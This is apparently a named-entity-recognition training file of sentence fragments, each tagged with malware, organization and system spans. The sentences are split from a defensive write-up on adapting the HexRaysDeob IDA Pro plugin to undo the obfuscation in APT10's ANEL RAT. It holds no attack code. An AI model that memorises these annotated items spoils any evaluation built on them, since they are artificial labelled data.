{"text": "Another obfuscation ,", "spans": {}, "info": {"id": "aptner_train_000234", "source": "aptner_train"}}
{"text": "control flow flattening ,", "spans": {}, "info": {"id": "aptner_train_000235", "source": "aptner_train"}}
{"text": "was applied to APT10 ANEL and Dharma ransomware packer .", "spans": {"Organization: APT10": [[15, 20]], "Malware: ANEL": [[21, 25]], "Malware: Dharma": [[30, 36]]}, "info": {"id": "aptner_train_000236", "source": "aptner_train"}}
{"text": "ANEL ( also referred to as UpperCut )", "spans": {"Malware: ANEL": [[0, 4]], "Malware: UpperCut": [[27, 35]]}, "info": {"id": "aptner_train_000237", "source": "aptner_train"}}
{"text": "is a RAT program used by APT10 and observed in Japan uniquely .", "spans": {"Organization: APT10": [[25, 30]]}, "info": {"id": "aptner_train_000238", "source": "aptner_train"}}
{"text": "According to SecureWorks ,", "spans": {"Organization: SecureWorks": [[13, 24]]}, "info": {"id": "aptner_train_000239", "source": "aptner_train"}}
{"text": "all ANEL samples whose version is 5.3.0 or later are obfuscated with opaque predicates and control flow flattening .", "spans": {"Malware: ANEL": [[4, 8]]}, "info": {"id": "aptner_train_000240", "source": "aptner_train"}}
{"text": "Opaque predicate is a programming term that refers to decision making where there is actually only one path .", "spans": {}, "info": {"id": "aptner_train_000241", "source": "aptner_train"}}
{"text": "For example ,", "spans": {}, "info": {"id": "aptner_train_000242", "source": "aptner_train"}}
{"text": "this can be seen as calculating a value that will always return True .", "spans": {}, "info": {"id": "aptner_train_000243", "source": "aptner_train"}}
{"text": "Control flow flattening is an obfuscation method where programs do not cleanly flow from beginning to end .", "spans": {}, "info": {"id": "aptner_train_000244", "source": "aptner_train"}}
{"text": "Instead ,", "spans": {}, "info": {"id": "aptner_train_000245", "source": "aptner_train"}}
{"text": "a switch statement is called in an infinite loop having multiple code blocks each performing operations .", "spans": {}, "info": {"id": "aptner_train_000246", "source": "aptner_train"}}
{"text": "The obfuscations looked similar to the ones explained in Hex-Rays blog ,", "spans": {}, "info": {"id": "aptner_train_000247", "source": "aptner_train"}}
{"text": "but the introduced IDA Pro plugin HexRaysDeob didn’t work for one of the obfuscated ANEL samples because the tool was made for another variant of the obfuscation .", "spans": {"System: IDA Pro": [[19, 26]], "System: HexRaysDeob": [[34, 45]], "Malware: ANEL": [[84, 88]]}, "info": {"id": "aptner_train_000248", "source": "aptner_train"}}
{"text": "TAU investigated the ANEL obfuscation algorithms then modified the HexRaysDeob code to defeat the obfuscations .", "spans": {"Organization: TAU": [[0, 3]], "Malware: ANEL": [[21, 25]], "System: HexRaysDeob": [[67, 78]]}, "info": {"id": "aptner_train_000249", "source": "aptner_train"}}
{"text": "After the modification ,", "spans": {}, "info": {"id": "aptner_train_000250", "source": "aptner_train"}}
{"text": "TAU was able to recover the original code .", "spans": {"Organization: TAU": [[0, 3]]}, "info": {"id": "aptner_train_000251", "source": "aptner_train"}}
{"text": "HexRaysDeob is an IDA Pro plugin written by Rolf Rolles to address obfuscation seen in binaries .", "spans": {"System: HexRaysDeob": [[0, 11]], "System: IDA Pro": [[18, 25]]}, "info": {"id": "aptner_train_000252", "source": "aptner_train"}}
{"text": "In order to perform the deobfuscation ,", "spans": {}, "info": {"id": "aptner_train_000253", "source": "aptner_train"}}
{"text": "the plugin manipulates the IDA intermediate language called microcode .", "spans": {}, "info": {"id": "aptner_train_000254", "source": "aptner_train"}}
{"text": "If you aren’t familiar with those structures ( e.g ,", "spans": {}, "info": {"id": "aptner_train_000255", "source": "aptner_train"}}
{"text": "microcode data structures ,", "spans": {}, "info": {"id": "aptner_train_000256", "source": "aptner_train"}}
{"text": "maturity level ,", "spans": {}, "info": {"id": "aptner_train_000257", "source": "aptner_train"}}
{"text": "Microcode Explorer and so on )", "spans": {"System: Microcode Explorer": [[0, 18]]}, "info": {"id": "aptner_train_000258", "source": "aptner_train"}}
{"text": ",", "spans": {}, "info": {"id": "aptner_train_000259", "source": "aptner_train"}}
{"text": "you should read his blog post .", "spans": {}, "info": {"id": "aptner_train_000260", "source": "aptner_train"}}
{"text": "Rolles also provides an overview of each obfuscation technique in the same post .", "spans": {}, "info": {"id": "aptner_train_000261", "source": "aptner_train"}}
{"text": "HexRaysDeob installs two callbacks when loading :", "spans": {"System: HexRaysDeob": [[0, 11]]}, "info": {"id": "aptner_train_000262", "source": "aptner_train"}}
{"text": "optinsn_t for defeating opaque predicates ( defined as ObfCompilerOptimizer )", "spans": {"System: optinsn_t": [[0, 9]], "System: ObfCompilerOptimizer": [[55, 75]]}, "info": {"id": "aptner_train_000263", "source": "aptner_train"}}
{"text": "optblock_t for defeating control flow flattening ( defined as CFUnflattener )", "spans": {"System: optblock_t": [[0, 10]]}, "info": {"id": "aptner_train_000264", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000265", "source": "aptner_train"}}
{"text": "Before continuing ,", "spans": {}, "info": {"id": "aptner_train_000266", "source": "aptner_train"}}
{"text": "it is important to understand Hex-Rays maturity levels .", "spans": {"System: Hex-Rays": [[30, 38]]}, "info": {"id": "aptner_train_000267", "source": "aptner_train"}}
{"text": "When a binary is loaded into IDA Pro ,", "spans": {"System: IDA Pro": [[29, 36]]}, "info": {"id": "aptner_train_000268", "source": "aptner_train"}}
{"text": "the application will perform distinct layers of code analysis and optimization ,", "spans": {}, "info": {"id": "aptner_train_000269", "source": "aptner_train"}}
{"text": "referred to as maturity levels .", "spans": {}, "info": {"id": "aptner_train_000270", "source": "aptner_train"}}
{"text": "One layer will detect shellcode ,", "spans": {}, "info": {"id": "aptner_train_000271", "source": "aptner_train"}}
{"text": "another optimizes it into blocks ,", "spans": {}, "info": {"id": "aptner_train_000272", "source": "aptner_train"}}
{"text": "another determines global variables ,", "spans": {}, "info": {"id": "aptner_train_000273", "source": "aptner_train"}}
{"text": "and so forth .", "spans": {}, "info": {"id": "aptner_train_000274", "source": "aptner_train"}}
{"text": "The optinsn_t : :f unc callback function is called in maturity levels from MMAT_ZERO ( microcode does not exist )", "spans": {"System: optinsn_t : :f unc": [[4, 22]], "System: MMAT_ZERO": [[75, 84]]}, "info": {"id": "aptner_train_000275", "source": "aptner_train"}}
{"text": "to MMAT_GLBOPT2 ( most global optimizations completed )", "spans": {"System: MMAT_GLBOPT2": [[3, 15]]}, "info": {"id": "aptner_train_000276", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000277", "source": "aptner_train"}}
{"text": "During the callback ,", "spans": {}, "info": {"id": "aptner_train_000278", "source": "aptner_train"}}
{"text": "opaque predicates pattern matching functions are called .", "spans": {}, "info": {"id": "aptner_train_000279", "source": "aptner_train"}}
{"text": "If the code pattern is matched with the definitions ,", "spans": {}, "info": {"id": "aptner_train_000280", "source": "aptner_train"}}
{"text": "it is replaced with another expression for the deobfuscation .", "spans": {}, "info": {"id": "aptner_train_000281", "source": "aptner_train"}}
{"text": "This is important to perform in each maturity level as the obfuscated code could be modified or removed as the code becomes more optimized .", "spans": {}, "info": {"id": "aptner_train_000282", "source": "aptner_train"}}
{"text": "We defined two patterns for analysis of the ANEL sample .", "spans": {"Malware: ANEL": [[44, 48]]}, "info": {"id": "aptner_train_000283", "source": "aptner_train"}}
{"text": "The global variable value dword_745BB58C is either even or odd ,", "spans": {}, "info": {"id": "aptner_train_000284", "source": "aptner_train"}}
{"text": "so dword_745BB58C * ( dword_745BB58C – 1 )", "spans": {}, "info": {"id": "aptner_train_000285", "source": "aptner_train"}}
{"text": "is always even .", "spans": {}, "info": {"id": "aptner_train_000286", "source": "aptner_train"}}
{"text": "This results in", "spans": {}, "info": {"id": "aptner_train_000287", "source": "aptner_train"}}
{"text": "the lowest bit of the negated value becoming 1 .", "spans": {}, "info": {"id": "aptner_train_000288", "source": "aptner_train"}}
{"text": "Thus ,", "spans": {}, "info": {"id": "aptner_train_000289", "source": "aptner_train"}}
{"text": "OR by -2 ( 0xFFFFFFFE )", "spans": {}, "info": {"id": "aptner_train_000290", "source": "aptner_train"}}
{"text": "will always produce the value -1 .", "spans": {}, "info": {"id": "aptner_train_000291", "source": "aptner_train"}}
{"text": "In this case ,", "spans": {}, "info": {"id": "aptner_train_000292", "source": "aptner_train"}}
{"text": "the pattern matching function replaces dword_745BB58C * ( dword_745BB58C – 1 )", "spans": {}, "info": {"id": "aptner_train_000293", "source": "aptner_train"}}
{"text": "with 2 .", "spans": {}, "info": {"id": "aptner_train_000294", "source": "aptner_train"}}
{"text": "The global variable value dword_72DBB588 is always 0 because the value is not initialized ( we can check it by is_loaded API )", "spans": {"System: is_loaded API": [[111, 124]]}, "info": {"id": "aptner_train_000295", "source": "aptner_train"}}
{"text": "and has only read accesses .", "spans": {}, "info": {"id": "aptner_train_000296", "source": "aptner_train"}}
{"text": "So the pattern matching function replaces the global variable with 0 .", "spans": {}, "info": {"id": "aptner_train_000297", "source": "aptner_train"}}
{"text": "There are some variants with this pattern ( e.g , the variable – 10 < 0 )", "spans": {}, "info": {"id": "aptner_train_000298", "source": "aptner_train"}}
{"text": ",", "spans": {}, "info": {"id": "aptner_train_000299", "source": "aptner_train"}}
{"text": "where the immediate constant can be different .", "spans": {}, "info": {"id": "aptner_train_000300", "source": "aptner_train"}}
{"text": "We also observed a pattern that was also using an 8-bit portion of the register .", "spans": {}, "info": {"id": "aptner_train_000301", "source": "aptner_train"}}
{"text": "In the following example ,", "spans": {}, "info": {"id": "aptner_train_000302", "source": "aptner_train"}}
{"text": "the variable v5 in pseudocode is a register operand ( cl )", "spans": {}, "info": {"id": "aptner_train_000303", "source": "aptner_train"}}
{"text": "in microcode .", "spans": {}, "info": {"id": "aptner_train_000304", "source": "aptner_train"}}
{"text": "We need to check if the value comes from the result of x * ( x – 1 )", "spans": {}, "info": {"id": "aptner_train_000305", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000306", "source": "aptner_train"}}
{"text": "In another example ,", "spans": {}, "info": {"id": "aptner_train_000307", "source": "aptner_train"}}
{"text": "the variable v2 in pseudocode is a register operand ( ecx )", "spans": {}, "info": {"id": "aptner_train_000308", "source": "aptner_train"}}
{"text": "in microcode .", "spans": {}, "info": {"id": "aptner_train_000309", "source": "aptner_train"}}
{"text": "We have to validate if a global variable with above-mentioned conditions is assigned to the register .", "spans": {}, "info": {"id": "aptner_train_000310", "source": "aptner_train"}}
{"text": "Data-flow tracking code was added to detect these use-cases .", "spans": {}, "info": {"id": "aptner_train_000311", "source": "aptner_train"}}
{"text": "The added code requires that the mblock_t pointer information is passed from the argument of optinsn_t : :f unc to trace back previous instructions using the mblock_t linked list .", "spans": {"System: mblock_t": [[33, 41], [158, 166]], "System: optinsn_t : :f unc": [[93, 111]]}, "info": {"id": "aptner_train_000312", "source": "aptner_train"}}
{"text": "However ,", "spans": {}, "info": {"id": "aptner_train_000313", "source": "aptner_train"}}
{"text": "the callback returns NULL from the mblock_t pointer if the instruction is not a top-level one .", "spans": {"System: mblock_t": [[35, 43]]}, "info": {"id": "aptner_train_000314", "source": "aptner_train"}}
{"text": "If the setl is always sub-instruction during the optimization ,", "spans": {}, "info": {"id": "aptner_train_000315", "source": "aptner_train"}}
{"text": "we never get the pointer .", "spans": {}, "info": {"id": "aptner_train_000316", "source": "aptner_train"}}
{"text": "To handle this type of scenario ,", "spans": {}, "info": {"id": "aptner_train_000317", "source": "aptner_train"}}
{"text": "the code was modified to catch and pass the mblock_t of the jnz instruction to the sub-instruction .", "spans": {"System: mblock_t": [[44, 52]]}, "info": {"id": "aptner_train_000318", "source": "aptner_train"}}
{"text": "The original implementation calls the optblock_t : :f unc callback function in MMAT_LOCOPT ( local optimization and graphing are complete )", "spans": {"System: optblock_t : :f unc": [[38, 57]], "System: MMAT_LOCOPT": [[79, 90]]}, "info": {"id": "aptner_train_000319", "source": "aptner_train"}}
{"text": "maturity level .", "spans": {}, "info": {"id": "aptner_train_000320", "source": "aptner_train"}}
{"text": "Rolles previously explained the unflattening algorithm in a Hex-Rays blog .", "spans": {"System: Hex-Rays": [[60, 68]]}, "info": {"id": "aptner_train_000321", "source": "aptner_train"}}
{"text": "For brevity I will quickly cover some key points to understand the algorithm at a high level .", "spans": {}, "info": {"id": "aptner_train_000322", "source": "aptner_train"}}
{"text": "Normally the call flow graph ( CFG )", "spans": {}, "info": {"id": "aptner_train_000323", "source": "aptner_train"}}
{"text": "of a function obfuscated with control flow flattening has a loop structure starting with yellow-colored “ control flow dispatcher ”", "spans": {}, "info": {"id": "aptner_train_000324", "source": "aptner_train"}}
{"text": "like this ,", "spans": {}, "info": {"id": "aptner_train_000325", "source": "aptner_train"}}
{"text": "shown after the First Block .", "spans": {}, "info": {"id": "aptner_train_000326", "source": "aptner_train"}}
{"text": "The original code is separated into the orange-colored “ first block ”", "spans": {}, "info": {"id": "aptner_train_000327", "source": "aptner_train"}}
{"text": "and green-colored flattened blocks .", "spans": {}, "info": {"id": "aptner_train_000328", "source": "aptner_train"}}
{"text": "The analyst is then required to resolve the correct next block and modify the destination accordingly .", "spans": {}, "info": {"id": "aptner_train_000329", "source": "aptner_train"}}
{"text": "The next portion of first block and each flattened block is decided by a “ block comparison variable ”", "spans": {}, "info": {"id": "aptner_train_000330", "source": "aptner_train"}}
{"text": "with an immediate value .", "spans": {}, "info": {"id": "aptner_train_000331", "source": "aptner_train"}}
{"text": "The value of the variable is assigned to a specific register in each block then compared in a control flow dispatcher and other condition blocks .", "spans": {}, "info": {"id": "aptner_train_000332", "source": "aptner_train"}}
{"text": "If the variable registers for the comparison and assignment are different ,", "spans": {}, "info": {"id": "aptner_train_000333", "source": "aptner_train"}}
{"text": "the assignment variable is called “ block update variable ”", "spans": {}, "info": {"id": "aptner_train_000334", "source": "aptner_train"}}
{"text": "( which is further explained later )", "spans": {}, "info": {"id": "aptner_train_000335", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000336", "source": "aptner_train"}}
{"text": "The algorithm looks straightforward however some portions of the code had to be modified in order to correctly deobfuscate the code .", "spans": {}, "info": {"id": "aptner_train_000337", "source": "aptner_train"}}
{"text": "This is further detailed below .", "spans": {}, "info": {"id": "aptner_train_000338", "source": "aptner_train"}}
{"text": "As previously detailed ,", "spans": {}, "info": {"id": "aptner_train_000339", "source": "aptner_train"}}
{"text": "the original implementation of the code only works in MMAT_LOCOPT maturity level .", "spans": {"System: MMAT_LOCOPT": [[54, 65]]}, "info": {"id": "aptner_train_000340", "source": "aptner_train"}}
{"text": "Rolles said this was to handle another obfuscation called “ Odd Stack Manipulations ”", "spans": {}, "info": {"id": "aptner_train_000341", "source": "aptner_train"}}
{"text": ",", "spans": {}, "info": {"id": "aptner_train_000342", "source": "aptner_train"}}
{"text": "referred in his blog )", "spans": {}, "info": {"id": "aptner_train_000343", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000344", "source": "aptner_train"}}
{"text": "However the unflattening of ANEL code had to be performed in the later maturity level since the assignment of block comparison variable heavily depends on opaque predicates .", "spans": {"Malware: ANEL": [[28, 32]]}, "info": {"id": "aptner_train_000345", "source": "aptner_train"}}
{"text": "As an example in the following obfuscated function ,", "spans": {}, "info": {"id": "aptner_train_000346", "source": "aptner_train"}}
{"text": "the v3 and v7 variables are assigned to the block comparison variable ( b_cmp )", "spans": {}, "info": {"id": "aptner_train_000347", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000348", "source": "aptner_train"}}
{"text": "However the values are dependent on opaque predicates results .", "spans": {}, "info": {"id": "aptner_train_000349", "source": "aptner_train"}}
{"text": "Once the opaque predicates are broken ,", "spans": {}, "info": {"id": "aptner_train_000350", "source": "aptner_train"}}
{"text": "the loop code becomes simpler .", "spans": {}, "info": {"id": "aptner_train_000351", "source": "aptner_train"}}
{"text": "Unflattening the code in later maturity levels like MMAT_GLBOPT1 and MMAT_GLBOPT2 ( first and second pass of global optimization )", "spans": {"System: MMAT_GLBOPT1": [[52, 64]], "System: MMAT_GLBOPT2": [[69, 81]]}, "info": {"id": "aptner_train_000352", "source": "aptner_train"}}
{"text": "caused additional problems .", "spans": {}, "info": {"id": "aptner_train_000353", "source": "aptner_train"}}
{"text": "The unflattening algorithm requires mapping information between block comparison variable and the actual block number ( mblock_t : :s erial )", "spans": {"System: mblock_t : :s erial": [[120, 139]]}, "info": {"id": "aptner_train_000354", "source": "aptner_train"}}
{"text": "used in the microcode .", "spans": {}, "info": {"id": "aptner_train_000355", "source": "aptner_train"}}
{"text": "In later maturity levels ,", "spans": {}, "info": {"id": "aptner_train_000356", "source": "aptner_train"}}
{"text": "some blocks are deleted by the optimization after defeating opaque predicates ,", "spans": {}, "info": {"id": "aptner_train_000357", "source": "aptner_train"}}
{"text": "which removes the mapping information .", "spans": {}, "info": {"id": "aptner_train_000358", "source": "aptner_train"}}
{"text": "In the example below ,", "spans": {}, "info": {"id": "aptner_train_000359", "source": "aptner_train"}}
{"text": "the blue-highlighted immediate value 0x4624F47C is assigned to block comparison variable in the first block .", "spans": {}, "info": {"id": "aptner_train_000360", "source": "aptner_train"}}
{"text": "The mapping can be created by checking the conditional jump instruction ( jnz )", "spans": {}, "info": {"id": "aptner_train_000361", "source": "aptner_train"}}
{"text": "in MMAT_LOCOPT .", "spans": {"System: MMAT_LOCOPT": [[3, 14]]}, "info": {"id": "aptner_train_000362", "source": "aptner_train"}}
{"text": "Additionally here is no mapping information in MMAT_GLBOPT2 because the condition block that contains the variable has been deleted .", "spans": {"System: MMAT_GLBOPT2": [[47, 59]]}, "info": {"id": "aptner_train_000363", "source": "aptner_train"}}
{"text": "So the next block of the first one in the level can not be determined .", "spans": {}, "info": {"id": "aptner_train_000364", "source": "aptner_train"}}
{"text": "To resolve that issue ,", "spans": {}, "info": {"id": "aptner_train_000365", "source": "aptner_train"}}
{"text": "the code was written to link the block comparison variable and block address in MMAT_LOCOPT ,", "spans": {"System: MMAT_LOCOPT": [[80, 91]]}, "info": {"id": "aptner_train_000366", "source": "aptner_train"}}
{"text": "as the block number is changed in each maturity level .", "spans": {}, "info": {"id": "aptner_train_000367", "source": "aptner_train"}}
{"text": "If the code can’t determine the mapping in later maturity levels ,", "spans": {}, "info": {"id": "aptner_train_000368", "source": "aptner_train"}}
{"text": "it attempts to guess the next block number based on the address ,", "spans": {}, "info": {"id": "aptner_train_000369", "source": "aptner_train"}}
{"text": "considering each block and instruction addresses .", "spans": {}, "info": {"id": "aptner_train_000370", "source": "aptner_train"}}
{"text": "The guessing is not 100% accurate however it works for the majority of obfuscated functions tested .", "spans": {}, "info": {"id": "aptner_train_000371", "source": "aptner_train"}}
{"text": "Though the original implementation assumes an obfuscated function has only one control flow dispatcher ,", "spans": {}, "info": {"id": "aptner_train_000372", "source": "aptner_train"}}
{"text": "some functions in the ANEL sample have multiple control dispatchers .", "spans": {}, "info": {"id": "aptner_train_000373", "source": "aptner_train"}}
{"text": "Originally the code called the optblock_t : :f unc callback in MMAT_GLBOPT1 and MMAT_GLBOPT2 ,", "spans": {"System: optblock_t : :f unc": [[31, 50]], "System: MMAT_GLBOPT1": [[63, 75]], "System: MMAT_GLBOPT2": [[80, 92]]}, "info": {"id": "aptner_train_000374", "source": "aptner_train"}}
{"text": "as the result was not correct in MMAT_CALLS ( detecting call arguments )", "spans": {"System: MMAT_CALLS": [[33, 43]]}, "info": {"id": "aptner_train_000375", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000376", "source": "aptner_train"}}
{"text": "However ,", "spans": {}, "info": {"id": "aptner_train_000377", "source": "aptner_train"}}
{"text": "this did not work for functions with three or more dispatchers .", "spans": {}, "info": {"id": "aptner_train_000378", "source": "aptner_train"}}
{"text": "Additionally ,", "spans": {}, "info": {"id": "aptner_train_000379", "source": "aptner_train"}}
{"text": "Hex-Rays kernel doesn’t optimize some functions in MMAT_GLBOPT2 if it judges the optimization within the level is not required .", "spans": {"System: Hex-Rays": [[0, 8]], "System: MMAT_GLBOPT2": [[51, 63]]}, "info": {"id": "aptner_train_000380", "source": "aptner_train"}}
{"text": "In this case ,", "spans": {}, "info": {"id": "aptner_train_000381", "source": "aptner_train"}}
{"text": "the callback is executed just once in the implementation .", "spans": {}, "info": {"id": "aptner_train_000382", "source": "aptner_train"}}
{"text": "To handle multiple control flow dispatchers ,", "spans": {}, "info": {"id": "aptner_train_000383", "source": "aptner_train"}}
{"text": "a callback for decompiler events was implemented .", "spans": {}, "info": {"id": "aptner_train_000384", "source": "aptner_train"}}
{"text": "The code catches the “ hxe_prealloc ”", "spans": {}, "info": {"id": "aptner_train_000385", "source": "aptner_train"}}
{"text": "event ( according to Hex-Rays ,", "spans": {"System: Hex-Rays": [[21, 29]]}, "info": {"id": "aptner_train_000386", "source": "aptner_train"}}
{"text": "this is the final event for optimizations )", "spans": {}, "info": {"id": "aptner_train_000387", "source": "aptner_train"}}
{"text": "then calls optblock_t : :f unc callback .", "spans": {"System: calls optblock_t : :f unc": [[5, 30]]}, "info": {"id": "aptner_train_000388", "source": "aptner_train"}}
{"text": "Typically this event occurs a few times to several times ,", "spans": {}, "info": {"id": "aptner_train_000389", "source": "aptner_train"}}
{"text": "so the callback can deobfuscate multiple control flow flattenings .", "spans": {}, "info": {"id": "aptner_train_000390", "source": "aptner_train"}}
{"text": "Other additional modifications were made to the code ( e.g , writing a new algorithm for finding control flow dispatcher and first block ,", "spans": {}, "info": {"id": "aptner_train_000391", "source": "aptner_train"}}
{"text": "validating a block comparison variable ,", "spans": {}, "info": {"id": "aptner_train_000392", "source": "aptner_train"}}
{"text": "and so on )", "spans": {}, "info": {"id": "aptner_train_000393", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000394", "source": "aptner_train"}}
{"text": "After the modification ,", "spans": {}, "info": {"id": "aptner_train_000395", "source": "aptner_train"}}
{"text": "for example ,", "spans": {}, "info": {"id": "aptner_train_000396", "source": "aptner_train"}}
{"text": "the following functions with multiple control flow dispatchers can be unflattened .", "spans": {}, "info": {"id": "aptner_train_000397", "source": "aptner_train"}}
{"text": "The original implementation supports the following two cases of flattened blocks to find a block comparison variable for the next block ( the cases are then simplified )", "spans": {}, "info": {"id": "aptner_train_000398", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000399", "source": "aptner_train"}}
{"text": "In the second case ,", "spans": {}, "info": {"id": "aptner_train_000400", "source": "aptner_train"}}
{"text": "block comparison variable is searched in each block of endsWithJcc and nonJcc .", "spans": {"System: endsWithJcc": [[55, 66]], "System: nonJcc": [[71, 77]]}, "info": {"id": "aptner_train_000401", "source": "aptner_train"}}
{"text": "If the next block is resolved ,", "spans": {}, "info": {"id": "aptner_train_000402", "source": "aptner_train"}}
{"text": "the CFG ( specifically mblock_t : :p redset and mblock_t : :s uccset )", "spans": {"System: mblock_t : :p redset": [[23, 43]], "System: mblock_t : :s uccset": [[48, 68]]}, "info": {"id": "aptner_train_000403", "source": "aptner_train"}}
{"text": "and the destination of goto jump instruction are updated .", "spans": {}, "info": {"id": "aptner_train_000404", "source": "aptner_train"}}
{"text": "The code tracks the block comparison variable in each predecessor and more ( if any conditional blocks before the predecessor )", "spans": {}, "info": {"id": "aptner_train_000405", "source": "aptner_train"}}
{"text": "to identify each next block for unflattening .", "spans": {}, "info": {"id": "aptner_train_000406", "source": "aptner_train"}}
{"text": "And ,", "spans": {}, "info": {"id": "aptner_train_000407", "source": "aptner_train"}}
{"text": "in the third case that was implemented ,", "spans": {}, "info": {"id": "aptner_train_000408", "source": "aptner_train"}}
{"text": "the block comparison variables are not assigned in the flattened blocks but rather the first blocks according to a condition .", "spans": {}, "info": {"id": "aptner_train_000409", "source": "aptner_train"}}
{"text": "For example ,", "spans": {}, "info": {"id": "aptner_train_000410", "source": "aptner_train"}}
{"text": "the following microcode graph shows edi is assigned to esi ( the block comparison variable in this case )", "spans": {}, "info": {"id": "aptner_train_000411", "source": "aptner_train"}}
{"text": "in block number 7 but the edi value is assigned in block number 1 and 2 .", "spans": {}, "info": {"id": "aptner_train_000412", "source": "aptner_train"}}
{"text": "If the immediate value for block comparison variable is not found in the flattened blocks ,", "spans": {}, "info": {"id": "aptner_train_000413", "source": "aptner_train"}}
{"text": "the new code tries to trace the first blocks to obtain the value and reconnects block number 1 and 2 as successors of block number 7 ,", "spans": {}, "info": {"id": "aptner_train_000414", "source": "aptner_train"}}
{"text": "in addition to normal operations mentioned in the original cases .", "spans": {}, "info": {"id": "aptner_train_000415", "source": "aptner_train"}}
{"text": "In this case ,", "spans": {}, "info": {"id": "aptner_train_000416", "source": "aptner_train"}}
{"text": "the code parses the structure in first blocks then reconnects each conditional blocks under the flattened blocks ( #1 and #2 as successors of #13 ,", "spans": {}, "info": {"id": "aptner_train_000417", "source": "aptner_train"}}
{"text": "#3 and #4 as successors of #11 )", "spans": {}, "info": {"id": "aptner_train_000418", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000419", "source": "aptner_train"}}
{"text": "Last ,", "spans": {}, "info": {"id": "aptner_train_000420", "source": "aptner_train"}}
{"text": "but not least ,", "spans": {}, "info": {"id": "aptner_train_000421", "source": "aptner_train"}}
{"text": "in all cases explained here ,", "spans": {}, "info": {"id": "aptner_train_000422", "source": "aptner_train"}}
{"text": "the tail instruction of the dispatcher predecessor can be a conditional jump like jnz ,", "spans": {}, "info": {"id": "aptner_train_000423", "source": "aptner_train"}}
{"text": "not just goto .", "spans": {}, "info": {"id": "aptner_train_000424", "source": "aptner_train"}}
{"text": "The modified code checks the tail instruction and if the true case destination is a control flow dispatcher ,", "spans": {}, "info": {"id": "aptner_train_000425", "source": "aptner_train"}}
{"text": "it updates the CFG and the destination of the instruction .", "spans": {}, "info": {"id": "aptner_train_000426", "source": "aptner_train"}}
{"text": "The following changes are minor compared with above referenced ones .", "spans": {}, "info": {"id": "aptner_train_000427", "source": "aptner_train"}}
{"text": "Additional jump instructions are supported when collecting block comparison variable candidates and mapping between the variable and ea or block number ( jnz/jle in JZCollector ,", "spans": {"System: JZCollector": [[165, 176]]}, "info": {"id": "aptner_train_000428", "source": "aptner_train"}}
{"text": "jnz in JZMapper )", "spans": {"System: JZMapper": [[7, 15]]}, "info": {"id": "aptner_train_000429", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000430", "source": "aptner_train"}}
{"text": "An entropy threshold adjustment due to check in high maturity level .", "spans": {}, "info": {"id": "aptner_train_000431", "source": "aptner_train"}}
{"text": "Multiple block tracking for getting block comparison variable .", "spans": {}, "info": {"id": "aptner_train_000432", "source": "aptner_train"}}
{"text": "And the last change that was introduced in regards to", "spans": {}, "info": {"id": "aptner_train_000433", "source": "aptner_train"}}
{"text": "the block update variable referred in the overview .", "spans": {}, "info": {"id": "aptner_train_000434", "source": "aptner_train"}}
{"text": "Some functions in the ANEL sample utilize this ,", "spans": {"Malware: ANEL": [[22, 26]]}, "info": {"id": "aptner_train_000435", "source": "aptner_train"}}
{"text": "however the assignment is a little bit tricky .", "spans": {}, "info": {"id": "aptner_train_000436", "source": "aptner_train"}}
{"text": "By using the and instruction ,", "spans": {}, "info": {"id": "aptner_train_000437", "source": "aptner_train"}}
{"text": "the immediate values used in comparison look different from assigned ones .", "spans": {}, "info": {"id": "aptner_train_000438", "source": "aptner_train"}}
{"text": "The modified code will consider this .", "spans": {}, "info": {"id": "aptner_train_000439", "source": "aptner_train"}}
{"text": "The modified tool was tested with an ANEL 5.4.1 payload dropped from a malicious document with the following hash ( previously reported by FireEye ) :", "spans": {"Malware: ANEL": [[37, 41]], "Organization: FireEye": [[139, 146]]}, "info": {"id": "aptner_train_000440", "source": "aptner_train"}}
{"text": "3d2b3c9f50ed36bef90139e6dd250f140c373664984b97a97a5a70333387d18d .", "spans": {"Indicator: 3d2b3c9f50ed36bef90139e6dd250f140c373664984b97a97a5a70333387d18d": [[0, 64]]}, "info": {"id": "aptner_train_000441", "source": "aptner_train"}}
{"text": "The code is able to deobfuscate 34 of 38 functions ( 89% )", "spans": {}, "info": {"id": "aptner_train_000442", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000443", "source": "aptner_train"}}
{"text": "It should be noted every function is not always obfuscated .", "spans": {}, "info": {"id": "aptner_train_000444", "source": "aptner_train"}}
{"text": "The failure examples are :", "spans": {}, "info": {"id": "aptner_train_000445", "source": "aptner_train"}}
{"text": "Not yet implemented cases ( e.g ,", "spans": {}, "info": {"id": "aptner_train_000446", "source": "aptner_train"}}
{"text": "a conditional jump of the dispatcher predecessor’s tail instruction in goto N predecessors case ,", "spans": {}, "info": {"id": "aptner_train_000447", "source": "aptner_train"}}
{"text": "consecutive if-statement flattened blocks )", "spans": {}, "info": {"id": "aptner_train_000448", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000449", "source": "aptner_train"}}
{"text": "An incorrect choice of control flow dispatcher and first block ( algorithm error )", "spans": {}, "info": {"id": "aptner_train_000450", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000451", "source": "aptner_train"}}
{"text": "These fixes will be prioritized for future releases .", "spans": {}, "info": {"id": "aptner_train_000452", "source": "aptner_train"}}
{"text": "Additionally there is a known issue with the result ( e.g , the remaining loop or paradoxical decompiled code )", "spans": {}, "info": {"id": "aptner_train_000453", "source": "aptner_train"}}
{"text": ",", "spans": {}, "info": {"id": "aptner_train_000454", "source": "aptner_train"}}
{"text": "using the following IDAPython command in Output window :", "spans": {"System: IDAPython": [[20, 29]]}, "info": {"id": "aptner_train_000455", "source": "aptner_train"}}
{"text": "idc.load_and_run_plugin", "spans": {}, "info": {"id": "aptner_train_000456", "source": "aptner_train"}}
